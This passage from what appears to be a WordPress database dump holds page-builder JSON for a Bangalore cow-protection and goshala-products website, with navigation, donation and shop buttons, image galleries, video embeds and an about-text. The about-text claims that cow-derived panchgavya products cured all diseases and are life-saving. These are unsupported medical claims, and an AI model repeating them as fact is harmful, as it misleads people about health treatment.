\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#B87100\",\"background_color_b_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]}},\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_stop\":{\"unit\":\"%\",\"size\":86,\"sizes\":[]},\"background_color_b\":\"#B87100\"},\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11689,1938,'_elementor_page_assets','a:0:{}'),(11709,1942,'_elementor_edit_mode','builder'),(11710,1942,'_elementor_template_type','wp-page'),(11711,1942,'_elementor_version','3.7.8'),(11712,1942,'_wp_page_template','elementor_canvas'),(11713,1942,'_elementor_data','[{\"id\":\"b112c10\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"1ae7508\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"74e98db\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d2498f7\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8894245\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7bcdc84\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c55b7c6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a7b8b63\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"18acd8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"814f867\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"8ee4602\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"e1e681d\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"2017c69\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"633ac34\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c89a5d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a0807d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b828571\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\",\"id\":1577,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0caef34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.<\\/p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung \\/ cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today\\u2019s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise\\/marketing, they are not able to reach people even people want these best products<\\/p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation\\u2019s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold\\u2019s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25721f3\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b7dd35b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c9a8b6b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a3c36fb\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: 